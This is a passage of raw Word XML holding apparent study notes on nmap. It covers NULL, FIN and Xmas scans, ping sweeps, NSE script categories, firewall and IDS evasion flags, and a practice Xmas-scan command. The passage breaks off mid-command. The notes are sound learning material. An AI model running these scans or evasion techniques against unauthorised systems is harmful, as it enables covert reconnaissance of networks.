        <w:t>NULL – no flags set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD5F9FD" w14:textId="7D416BE4" w:rsidR="0014441D" w:rsidRPr="0084205E" w:rsidRDefault="0014441D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>RST response if closed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D50D2D" w14:textId="02F39C80" w:rsidR="0014441D" w:rsidRPr="0084205E" w:rsidRDefault="0014441D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>FIN – packet sent with FIN flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C78CC7" w14:textId="29218629" w:rsidR="0014441D" w:rsidRPr="0084205E" w:rsidRDefault="0014441D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>RST is closed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06249DE7" w14:textId="0139C0EA" w:rsidR="0014441D" w:rsidRPr="0084205E" w:rsidRDefault="0014441D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>XMAS – malformed TCP packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAA8336" w14:textId="66978965" w:rsidR="0014441D" w:rsidRPr="0084205E" w:rsidRDefault="0014441D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>RST response for closed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7ED2EA" w14:textId="05299493" w:rsidR="0014441D" w:rsidRPr="0084205E" w:rsidRDefault="0014441D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00D75040" w:rsidRPr="0084205E">
        <w:t>FC 739 – Windows and Cisco often reply to malformed TCP packets with RST, even if port is not closed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27358540" w14:textId="5F32882C" w:rsidR="00D75040" w:rsidRPr="0084205E" w:rsidRDefault="00D75040" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ICMP Network Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309EE3F1" w14:textId="5FE2EAD8" w:rsidR="00D75040" w:rsidRPr="0084205E" w:rsidRDefault="00D75040" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ping sweep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F585223" w14:textId="73803333" w:rsidR="00D75040" w:rsidRPr="0084205E" w:rsidRDefault="00D75040" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> + IP range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18391EC5" w14:textId="30F21192" w:rsidR="00D75040" w:rsidRPr="0084205E" w:rsidRDefault="00D75040" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Ex) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 192.168.0.1-254 or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 192.168.0.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5198DA04" w14:textId="7BE9B5DE" w:rsidR="00D75040" w:rsidRPr="0084205E" w:rsidRDefault="00D75040" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> prevents port scan, relying instead on ICMP packets (ARP for local)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF3083F" w14:textId="688781F8" w:rsidR="00D75040" w:rsidRPr="0084205E" w:rsidRDefault="00D75040" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Ex) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 172.16.0.0/16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3191FBAF" w14:textId="2C5D32D2" w:rsidR="001203E0" w:rsidRPr="0084205E" w:rsidRDefault="001203E0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">172.16.x.x network with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>netmasl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 255.255.0.0 and Class B CIDR notation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E736414" w14:textId="54F40EA7" w:rsidR="001203E0" w:rsidRPr="0084205E" w:rsidRDefault="001203E0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>[NSE Scripts] Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E30B1D" w14:textId="021C08A6" w:rsidR="001203E0" w:rsidRPr="0084205E" w:rsidRDefault="001203E0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Lua programming language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088468FA" w14:textId="1F24FA0D" w:rsidR="001203E0" w:rsidRPr="0084205E" w:rsidRDefault="001203E0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Several important categories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689986F5" w14:textId="31562C21" w:rsidR="0002449B" w:rsidRPr="0084205E" w:rsidRDefault="0002449B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use &lt;name&gt;* for all scripts with a name in it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E7B5C5" w14:textId="458FED87" w:rsidR="0002449B" w:rsidRPr="0084205E" w:rsidRDefault="0002449B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex - -script=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512F4849" w14:textId="7AC23BBF" w:rsidR="001203E0" w:rsidRPr="0084205E" w:rsidRDefault="001203E0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Safe – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>wont</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> affect target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087B1749" w14:textId="2DBCA20F" w:rsidR="001203E0" w:rsidRPr="0084205E" w:rsidRDefault="001203E0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Intrusive – not safe, likely affect target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A1EFFE" w14:textId="6E92D00B" w:rsidR="001203E0" w:rsidRPr="0084205E" w:rsidRDefault="001203E0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Vuln – scan for vulns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11442844" w14:textId="6AD12F9A" w:rsidR="001203E0" w:rsidRPr="0084205E" w:rsidRDefault="001203E0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Exploit – attempt to exploit vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761C1862" w14:textId="5B72D977" w:rsidR="001203E0" w:rsidRPr="0084205E" w:rsidRDefault="001203E0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Auth – attempt to bypass authentication for running services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600D8232" w14:textId="21CBBB0D" w:rsidR="001203E0" w:rsidRPr="0084205E" w:rsidRDefault="001203E0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Brute – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD39E91" w14:textId="05FC8382" w:rsidR="001203E0" w:rsidRPr="0084205E" w:rsidRDefault="001203E0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Discovery – query running services for further information about the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434DB49E" w14:textId="7A890975" w:rsidR="001203E0" w:rsidRPr="0084205E" w:rsidRDefault="001203E0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>--script=&lt;script-name</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;,&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>script-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763CD3B3" w14:textId="40F690F3" w:rsidR="001203E0" w:rsidRPr="0084205E" w:rsidRDefault="001203E0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>--script-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> (after –script=)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E23A13A" w14:textId="73F5E12B" w:rsidR="00EC11E2" w:rsidRPr="0084205E" w:rsidRDefault="00EC11E2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>&lt;script-name</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;.&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>argument&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACC2BFA" w14:textId="7B8CA052" w:rsidR="00EC11E2" w:rsidRPr="0084205E" w:rsidRDefault="00EC11E2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Check on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> website and storage on attacking machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEF6D34" w14:textId="1011B594" w:rsidR="00390539" w:rsidRPr="0084205E" w:rsidRDefault="00390539" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Firewall Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126FA6BD" w14:textId="0887143E" w:rsidR="00390539" w:rsidRPr="0084205E" w:rsidRDefault="00390539" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Default firewall will block ICMP</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41205555" w14:textId="6EA49E3D" w:rsidR="00390539" w:rsidRPr="0084205E" w:rsidRDefault="00390539" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Issue for ping and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C577156" w14:textId="61FDD88C" w:rsidR="00390539" w:rsidRPr="0084205E" w:rsidRDefault="00390539" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> does not ping host before scanning, treating target as alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62694BF3" w14:textId="34B8E485" w:rsidR="00390539" w:rsidRPr="0084205E" w:rsidRDefault="00390539" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Can also try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342385FA" w14:textId="36BF14DF" w:rsidR="00390539" w:rsidRPr="0084205E" w:rsidRDefault="00390539" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-f = fragment packets, harder to detect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9089E6" w14:textId="2BEBFE34" w:rsidR="00390539" w:rsidRPr="0084205E" w:rsidRDefault="00390539" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mtu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;number&gt; - max transmission size of packets (must be multiple of 8) like -f but more control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1783EC3B" w14:textId="33DB443C" w:rsidR="00390539" w:rsidRPr="0084205E" w:rsidRDefault="00390539" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>- - scan – delay &lt;time&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – used to add delay between packets sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD58257" w14:textId="1653B50A" w:rsidR="00390539" w:rsidRPr="0084205E" w:rsidRDefault="00390539" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Useful for unstable networks or IDS evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2454FB14" w14:textId="200C5716" w:rsidR="00390539" w:rsidRPr="0084205E" w:rsidRDefault="00390539" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">- - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>badsum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – used to generate invalid checksum for packets, which can be used to determine if IDS/firewall is present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1475B96B" w14:textId="3CC3932B" w:rsidR="00390539" w:rsidRPr="0084205E" w:rsidRDefault="002B21F8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Practical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F1A81F" w14:textId="01F0514D" w:rsidR="002B21F8" w:rsidRPr="0084205E" w:rsidRDefault="0070707F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Xmas scan on first 999 ports of target, how many are shown to be open or filtered?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6BB443" w14:textId="03D5F802" w:rsidR="0070707F" w:rsidRPr="0084205E" w:rsidRDefault="0070707F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Input: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A453D3" w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A453D3" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A453D3" w:rsidRPr="0084205E">
        <w:t>sX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A453D3" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A453D3" w:rsidRPr="0084205E">
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A453D3" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -p1-999 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A453D3" w:rsidRPr="0084205E">
        <w:t>vv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A453D3" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A453D3" w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
